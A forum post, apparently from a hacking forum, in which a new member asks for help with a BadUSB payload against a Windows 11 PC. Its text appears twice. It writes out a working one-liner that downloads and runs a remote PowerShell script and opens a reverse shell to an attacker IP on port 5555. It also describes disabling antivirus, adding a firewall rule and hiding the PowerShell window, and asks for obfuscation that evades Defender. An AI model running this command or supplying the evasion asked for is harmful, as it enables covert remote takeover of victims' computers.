- Joined
- April 9, 2025
- Messages
- 10
- Reaction score
- 1
- Points
- 3
- Thread Author
- #1
Hello,
This is my first post so bear with me on this one.
Goal: Create a bad usb script that does the following:
Disabling Anti virus/creates new rule to allow port 5555
Opens a powershell windows on the background without the user seeing it (except if they look in processes) this part is already in place.
script that establishes reverse shell:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.x.x.x 5555
Except when I manually fully disable defender it works so I think an obfuscation technique that works as of today would be the easiest.
Target will be a windows pc 11 suspecting to have basic sec so nothing special.
Feel free to ask me for more info, any advice is more then welcome!
This is my first post so bear with me on this one.
Goal: Create a bad usb script that does the following:
Disabling Anti virus/creates new rule to allow port 5555
Opens a powershell windows on the background without the user seeing it (except if they look in processes) this part is already in place.
script that establishes reverse shell:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.x.x.x 5555
Except when I manually fully disable defender it works so I think an obfuscation technique that works as of today would be the easiest.
Target will be a windows pc 11 suspecting to have basic sec so nothing special.
Feel free to ask me for more info, any advice is more then welcome!